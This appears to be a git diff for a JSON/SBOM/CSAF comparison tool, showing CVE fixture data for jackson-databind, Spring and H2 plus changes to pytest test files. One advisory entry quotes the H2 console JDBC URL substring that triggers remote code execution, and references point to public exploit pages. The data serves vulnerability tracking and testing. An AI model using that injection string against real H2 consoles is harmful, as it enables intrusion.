cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36189/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35490"]}],"cve":"CVE-2020-35490","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-35490"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35490/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22950"]}],"cve":"CVE-2022-22950","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-04-03T00:01:00","ids":[{"system_name":"CVE Record","text":"CVE-2022-22950"},{"system_name":"Vmware Advisory","text":"cve-2022-22950"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Allocation of Resources Without Limits or Throttling in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Allocation of Resources Without Limits or Throttling in Spring Framework In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Vmware Advisory cve-2022-22950","url":"https://tanzu.vmware.com/security/cve-2022-22950"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22950/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20861","cwe":{"id":"917","name":"Improper Neutralization of Special Elements used in an Expression Language Statement"},"discovery_date":"2023-03-23T21:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-20861"},{"system_name":"NetApp Advisory","text":"ntap-20230420-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service via specially crafted SpEL expression"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service via specially crafted SpEL expression In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"NetApp Advisory ntap-20230420-0007","url":"https://security.netapp.com/advisory/ntap-20230420-0007"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20861"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20861/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20863"]}],"cve":"CVE-2023-20863","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-04-13T21:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-20863"},{"system_name":"NetApp Advisory","text":"ntap-20240524-0015"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service In Spring Framework versions prior to 5.2.24.release+ , 5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"NetApp Advisory ntap-20240524-0015","url":"https://security.netapp.com/advisory/ntap-20240524-0015"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20863"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20863/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45868"]}],"cve":"CVE-2022-45868","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T21:30:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-45868"},{"system_name":"GitHub Advisory","text":"GHSA-22wj-vf5f-wrvj"},{"system_name":"Google Advisory","text":"sonatype-2022-6243"}],"notes":[{"audience":"developers","category":"other","text":"Cleartext Storage of Sensitive Information","title":"Additional CWE: 312"},{"category":"description","details":"Vulnerability Description","text":"Password exposure in H2 Database "},{"category":"details","details":"Vulnerability Details","text":"# Password exposure in H2 Database  The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\""}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"],"known_not_affected":["com.h2database/h2@2.2.220"]},"references":[{"summary":"GitHub Advisory GHSA-22wj-vf5f-wrvj","url":"https://github.com/advisories/GHSA-22wj-vf5f-wrvj"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Google Advisory sonatype-2022-6243","url":"https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"]}],"title":"CVE-2022-45868/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23221"]}],"cve":"CVE-2022-23221","cwe":{"id":"88","name":"Improper Neutralization of Argument Delimiters in a Command"},"discovery_date":"2022-01-21T23:07:39","ids":[{"system_name":"Twitter Advisory","text":"1483824727936450564"},{"system_name":"CVE Record","text":"CVE-2022-23221"},{"system_name":"GitHub Advisory","text":"advisories"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0011"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Arbitrary code execution in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# Arbitrary code execution in H2 Console H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"],"known_not_affected":["com.h2database/h2@2.1.210"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jan/39"},{"summary":"GitHub Advisory advisories","url":"https://github.com/h2database/h2database/security/advisories"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"NetApp Advisory ntap-20230818-0011","url":"https://security.netapp.com/advisory/ntap-20230818-0011"},{"summary":"Twitter Advisory 1483824727936450564","url":"https://twitter.com/d0nkey_man/status/1483824727936450564"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"]}],"title":"CVE-2022-23221/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23463"]}],"cve":"CVE-2021-23463","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-12-16T14:29:57","ids":[{"system_name":"CVE Record","text":"CVE-2021-23463"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMH2DATABASE-1769238"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.h2database:h2."},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.h2database:h2. H2 is an embeddable RDBMS written in Java. The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability.  ## Related CVE(s) CVE-2021-23463, SNYK-JAVA-COMH2DATABASE-1769238"}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"],"known_not_affected":["com.h2database/h2@2.0.202"]},"references":[{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"NetApp Advisory ntap-20230818-0010","url":"https://security.netapp.com/advisory/ntap-20230818-0010"},{"summary":"Snyk Advisory SNYK-JAVA-COMH2DATABASE-1769238","url":"https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"]}],"title":"CVE-2021-23463/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42392"]}],"cve":"CVE-2021-42392","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-01-06T23:55:09","ids":[{"system_name":"CVE Record","text":"CVE-2021-42392"},{"system_name":"GitHub Advisory","text":"GHSA-h376-j262-vhq6"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"Secpod Advisory","text":"log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"},{"system_name":"NetApp Advisory","text":"ntap-20220119-0001"},{"system_name":"JFrog Advisory","text":"the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"RCE in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# RCE in H2 Console ### Impact H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from remote servers through JNDI.  H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet).  It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users.  ### Patches Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used.  ### Workarounds H2 Console should never be available to untrusted users.  `-webAllowOthers` is a dangerous setting that should be avoided.  H2 Console Servlet deployed on a web server can be protected with a security constraint: https://h2database.com/html/tutorial.html#usingH2ConsoleServlet If `webAllowOthers` is specified, you need to uncomment and edit `<security-role>` and `<security-constraint>` as necessary. See documentation of your web server for more details.  ### References This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"],"known_not_affected":["com.h2database/h2@2.0.206"]},"references":[{"summary":"GitHub Advisory GHSA-h376-j262-vhq6","url":"https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6"},{"summary":"JFrog Advisory the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console","url":"https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"NetApp Advisory ntap-20220119-0001","url":"https://security.netapp.com/advisory/ntap-20220119-0001"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Secpod Advisory log4shell-critical-remote-code-execution-vulnerability-in-h2database-console","url":"https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"]}],"title":"CVE-2021-42392/pkg:maven/com.h2database/h2@1.4.199?type=jar"}]}
\ No newline at end of file
diff --git a/test/test_bom_diff.py b/test/test_bom_diff.py
index e12d883..2ba7b0f 100644
--- a/test/test_bom_diff.py
+++ b/test/test_bom_diff.py
@@ -318,8 +318,10 @@ def results():
 def test_bom_diff(results, options_1):
     result, j1, j2 = compare_dicts(options_1)
     _, result_summary = perform_bom_diff(j1, j2)
-    assert unpack_misc_data(result_summary, j1.options) == results["result_4"]
-
+    x = unpack_misc_data(result_summary, j1.options)
+    assert len(x.get("diff_summary", {}).get(j1.filename, {}).get("components", {}).get("frameworks", [])) == 13
+    assert len(x.get("diff_summary", {}).get(j2.filename, {}).get("components", {}).get("frameworks", [])) == 1
+    assert len(x.get("common_summary", {}).get("components", {}).get("frameworks", [])) == 5
 
 def test_bom_diff_component_options(results, bom_dicts_1, bom_dicts_2, bom_dicts_3, bom_dicts_4, bom_dicts_5, bom_dicts_6, bom_dicts_7, bom_dicts_8):
     # test --allow-new-data for components
diff --git a/test/test_csaf_diff.py b/test/test_csaf_diff.py
index e5c3e53..edcca77 100644
--- a/test/test_csaf_diff.py
+++ b/test/test_csaf_diff.py
@@ -4,7 +4,7 @@
 import pytest
 
 from custom_json_diff.lib.custom_diff import compare_dicts, perform_csaf_diff
-from custom_json_diff.lib.custom_diff_classes import (CsafDicts, CsafVulnerability, Options, BomVdr, BomVdrAffects
+from custom_json_diff.lib.custom_diff_classes import (CsafVulnerability, Options, BomVdr, BomVdrAffects
 )
 
 
@@ -14,111 +14,13 @@ def options_1():
 
 
 @pytest.fixture
-def options_3():
-    return Options(file_1="test/csaf_1.json", file_2="test/csaf_2.json", preconfig_type="csaf", allow_new_data=True)
+def options_2():
+    return Options(file_1="test/csaf_3.json", file_2="test/csaf_4.json", preconfig_type="csaf", exclude=["vulnerabilities.[].acknowledgements"])
 
 
 @pytest.fixture
-def csaf_dicts_1():
-    options = Options(file_1="csaf_1.json", file_2="csaf_2.json", preconfig_type="csaf", allow_new_data=True)
-    return CsafDicts(options, "csaf_1.json", vulnerabilities=[CsafVulnerability({
-      "acknowledgements": [
-        [
-          {
-            "organization": "NVD",
-            "urls": [
-              "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"
-            ]
-          }
-        ]
-      ],
-      "cve": "CVE-2024-39689",
-      "cwe": {
-        "id": "345",
-        "name": "Insufficient Verification of Data Authenticity"
-      },
-      "discovery_date": "2024-07-05T20:06:40",
-      "ids": [
-        {
-          "system_name": "CVE Record",
-          "text": "CVE-2024-39689"
-        },
-        {
-          "system_name": "GitHub Advisory",
-          "text": "GHSA-248v-346w-9cwc"
-        }
-      ],
-      "notes": [
-        {
-          "category": "description",
-          "details": "Vulnerability Description",
-          "text": "Certifi removes GLOBALTRUST root certificate"
-        },
-        {
-          "category": "details",
-          "details": "Vulnerability Details",
-          "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.  GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."
-        }
-      ],
-      "product_status": {
-        "known_affected": [
-          "certifi@vers:pypi/>=2021.05.30|<2024.07.04"
-        ],
-        "known_not_affected": [
-          "certifi@2024.07.04"
-        ]
-      },
-      "references": [
-        {
-          "summary": "GitHub Advisory GHSA-248v-346w-9cwc",
-          "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"
-        },
-        {
-          "summary": "Google Mailing List",
-          "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"
-        },
-        {
-          "summary": "CVE Record",
-          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"
-        }
-      ],
-      "scores": [
-        {
-          "cvss_v3": {
-            "attackComplexity": "HIGH",
-            "attackVector": "NETWORK",
-            "availabilityImpact": "NONE",
-            "baseScore": 3.1,
-            "baseSeverity": "LOW",
-            "confidentialityImpact": "LOW",
-            "environmentalScore": 3.1,
-            "environmentalSeverity": "LOW",
-            "integrityImpact": "NONE",
-            "modifiedAttackComplexity": "HIGH",
-            "modifiedAttackVector": "NETWORK",
-            "modifiedAvailabilityImpact": "NONE",
-            "modifiedConfidentialityImpact": "LOW",
-            "modifiedIntegrityImpact": "NONE",
-            "modifiedPrivilegesRequired": "NONE",
-            "modifiedScope": "UNCHANGED",
-            "modifiedUserInteraction": "REQUIRED",
-            "privilegesRequired": "NONE",
-            "scope": "UNCHANGED",
-            "temporalScore": 3.1,
-            "temporalSeverity": "LOW",
-            "userInteraction": "REQUIRED",
-            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
-            "version": "3.1"
-          },
-          "products": [
-            "certifi@vers:pypi/>=2021.05.30|<2024.07.04"
-          ]
-        }
-      ],
-      "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"
-    }, options)
-
-    ])
+def options_3():
+    return Options(file_1="test/csaf_1.json", file_2="test/csaf_2.json", preconfig_type="csaf", allow_new_data=True)
 
 
 @pytest.fixture
@@ -127,132 +29,217 @@ def results():
         return json.load(f)
 
 
-def test_csaf_diff(results, options_1):
+def test_csaf_diff(results, options_1, options_2):
     result, j1, j2 = compare_dicts(options_1)
     _, result_summary = perform_csaf_diff(j1, j2)
     assert result_summary == results["result_13"]
+
     result, j2, j1 = compare_dicts(options_1)
     _, result_summary = perform_csaf_diff(j2, j1)
-    results["result_14"] = result_summary
     assert result_summary == results["result_14"]
 
+    result, j1, j2 = compare_dicts(options_2)
+    _, result_summary = perform_csaf_diff(j2, j1)
+    assert result_summary["diff_summary"] == {"test/csaf_3.json": {}, "test/csaf_4.json": {}}
+
 
 def test_csaf_diff_vuln_options(options_1):
     # test don't allow --allow-new-data or --allow-new-versions
